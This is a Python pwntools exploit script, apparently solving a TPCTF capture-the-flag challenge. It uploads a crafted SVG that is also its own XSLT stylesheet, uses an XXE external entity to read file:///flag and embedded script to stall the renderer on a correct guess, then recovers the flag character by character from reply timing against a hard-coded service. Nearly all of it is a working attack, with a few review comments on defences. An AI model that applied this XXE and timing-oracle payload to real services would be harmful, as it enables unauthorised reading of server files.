import time

from pwn import *
# Candidate alphabet tried, in this order, for each unknown position.
chars = "{}_-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Probe document uploaded as "test.svg". What the literal contains:
#   * a DTD declaring two entities that name file:///flag (flag_c as a SYSTEM
#     external entity, flag_p as a plain string value);
#   * an xml-stylesheet instruction whose href points back at the document, so
#     the file is also its own XSLT stylesheet;
#   * a template emitting an XHTML body with a hidden <p> holding &flag_c;
#     and a script that compares the first `flag_length` characters of that
#     paragraph with `flag_test` and, on a match, navigates to /test.svg in an
#     endless loop.
# `flag_test` and `flag_length` are placeholders filled in by send().
# The literal is kept on one line so its bytes are exactly those of the source.
# NOTE(review): the root weakness this relies on is a consumer that resolves
# DTD external entities and runs stylesheet/script content from an uploaded
# file. Parsers handling untrusted SVG/XML should disable DTDs and external
# entity resolution and should not execute embedded script or XSLT.
svg = '''<?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="?#"?> <!DOCTYPE div [ <!ENTITY flag_p "file:///flag"> <!ENTITY flag_c SYSTEM "file:///flag"> ]> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:copy-of select="document('')"/> <body xmlns="http://www.w3.org/1999/xhtml"> <div style="display:none"><p class="&flag_p;">&flag_c;</p></div> <script>document.querySelectorAll('p').forEach(p => {if(p.innerHTML.slice(0,flag_length)=="flag_test"){while(true){window.location.href="/test.svg"}}});</script> </body> </xsl:template> </xsl:stylesheet> '''


def send(flag, i):
    """Upload one probe document and time the service's reply.

    Args:
        flag: Candidate prefix substituted for the ``flag_test`` placeholder.
        i: Prefix length substituted for the ``flag_length`` placeholder.

    Returns:
        Seconds elapsed between finishing the upload and receiving the third
        newline-terminated line of the reply.
    """
    # Fill in the candidate first, then the length, as the original does.
    document = svg.replace("flag_test", flag).replace("flag_length", str(i))

    conn = remote("202.112.238.82", 23379)
    conn.recvuntil(b"File name: ")
    conn.sendline(b"test.svg")
    conn.recvuntil(b"Input your file:\n")
    conn.send(document.encode())
    conn.sendline(b"EOF")

    # The reply time is the only signal used; the content of the three lines
    # is discarded.
    # NOTE(review): presumably the service renders the upload and a matching
    # prefix keeps the renderer busy - confirm against the service.
    began = time.perf_counter()
    for _ in range(3):
        conn.recvuntil(b"\n")
    elapsed = time.perf_counter() - began
    conn.close()

    print(f"{flag}:{elapsed}")
    return elapsed
# Driver: extend the known prefix one character at a time.
# `i` is the length of the prefix under test, one more than the five
# characters already in `flag`.
i = 6
flag = 'TPCTF'
while True:
    for ch in chars:
        candidate = flag + ch
        # A reply slower than 10 seconds is taken as "prefix matched"; anything
        # faster discards the candidate character.
        if send(candidate, i) >= 10:
            flag = candidate
            i += 1
            break
    # NOTE(review): indentation was lost in the source; this print is placed at
    # the while level (once per pass over the alphabet) - confirm.
    # The loop has no exit condition and runs until interrupted.
    print("Valid_Now: " + flag)